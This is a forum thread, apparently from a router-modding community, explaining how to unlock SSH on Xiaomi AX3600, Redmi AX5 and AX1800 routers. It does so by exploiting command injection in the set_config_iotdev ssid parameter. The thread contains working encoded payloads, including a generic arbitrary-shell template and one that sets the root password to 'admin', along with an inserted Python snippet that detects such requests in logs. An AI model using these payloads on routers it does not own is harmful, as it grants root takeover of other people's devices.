Xiaomi ax3600 ssh guide

Half a year has passed since the release of the Xiaomi WiFi 6 router AX3600, and finally we can get SSH access on it.
The original exploit was found by LonGDikE from the Chinese Enshan forum.
Here are the steps:

  1. Downgrade your router to the 1.0.17 version: http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin
  2. Log in to your router and get the STOK like the following:
    http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
  3. Access these urls in browser:

(nvram set ssh_en=1;nvram commit)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

(sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

(/etc/init.d/dropbear start)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

  4. If everything is OK, SSH is enabled now.

PS: You can execute any shell code like this:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B<your encoded shell code>%3B

6 Likes
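An added example, not from the original post or its author: it decodes the percent-encoded `ssid` parameter of the request URLs quoted above and flags the shell metacharacters that turn an SSID value into a command injection. This is the kind of triage a defender would run over a router's HTTP access log to spot abuse of the `set_config_iotdev` endpoint; the list of metacharacters is a heuristic assumed here, and the sample input is the post's three URLs (STOK placeholder left in) plus one constructed benign request.

```python
from urllib.parse import unquote

# Constructed sample input: the three request URLs from the post above, with
# the <STOK> placeholder left in place, plus one benign request to the same
# endpoint for comparison.
SAMPLE_URLS = [
    "http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B",
    "http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B",
    "http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B",
    "http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=MyHomeWifi",
]

# Shell metacharacters that have no business in a legitimate SSID value.
# Heuristic list; an assumption of this example, not something from the post.
SHELL_META = (";", "|", "&&", "`", "$(", "\n")


def query_params(url):
    """Split the query string on '&' and on the first '=' of each pair, and
    only then percent-decode. Splitting before decoding matters: the injected
    ';' travels as %3B and must not be treated as a parameter separator."""
    _, _, query = url.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def decode_ssid(url):
    """Return the decoded ssid parameter, or '' if absent."""
    return query_params(url).get("ssid", "")


def looks_injected(value):
    """True if the decoded value carries shell metacharacters."""
    return any(token in value for token in SHELL_META)


def triage(urls):
    """Return (decoded_ssid, flagged) for each request URL."""
    result = []
    for url in urls:
        decoded = decode_ssid(url)
        result.append((decoded, looks_injected(decoded)))
    return result


if __name__ == "__main__":
    for decoded, flagged in triage(SAMPLE_URLS):
        print("FLAG" if flagged else "ok  ", repr(decoded))
```

The leading `-h;` in every flagged value is the tell: the endpoint hands the SSID to a shell, so the value terminates the intended argument and appends its own command. Matching on the decoded parameter rather than the raw URL is what keeps the check from being defeated by percent-encoding.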

First, thanks for this compilation to enable SSH!

For anyone who has a Redmi AX5, this tutorial works too to enable SSH on this device.

I tested this with firmware 1.0.16.

I want to add how to easily change the password to log in via SSH; it comes from the same author, LonGDikE.

Change the root password to "admin" when SSH is enabled; later you can change it as usual in the terminal.

http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

Hope my English is enough to understand me.

Did your Redmi AX5 have version 1.0.16 installed when you received it or did you downgrade?

I'm wondering how to find the download links for previous versions for the Mi AX1800.

Yes, received with 1.0.16 on the AX5.

If I find something for the AX1800 I'll tell you.

1 Like

I think I need to downgrade to 1.0.34, the link is available on right.com.cn forum but I'm not a member, maybe someone with access could post it here.

Edit: No need to downgrade; I gained SSH access to the Mi AX1800 running the latest 1.0.336 firmware after a reset and setup in router mode. In AP mode it didn't work.

I also have the AX5 and would love to load OpenWrt on it. Is there anything I can do to assist?

Looks like SSH can be permanent, but I'm having trouble with the Chinese forum... if someone could translate all the steps here, please...

"AX3600 permanently open telnet-ssh, you can upgrade and restore at will"
https://www.right.com.cn/forum/thread-4045295-1-1.html

edit: I managed to translate the post, but I can't get the attachment :frowning:

Step 1: Back up Xiaomi's bdata partition, which contains the router's SN code, SSH and other information. Before operating, confirm the partition details of the router:

root@XiaoQiang:~# cat /proc/mtd | grep bdata

mtd9: 00080000 00020000 "bdata"

You can see that my bdata partition is mtd9. Then enter the following command:

nanddump -f /tmp/bdata_mtd9.img /dev/mtd9

After the backup is complete, copy the bdata_mtd9.img file in the /tmp directory to the computer. You can use the WinSCP software to copy it directly, or use the scp command to copy it.
After the copy is completed, for safety reasons, I suggest making another copy and saving it, just in case.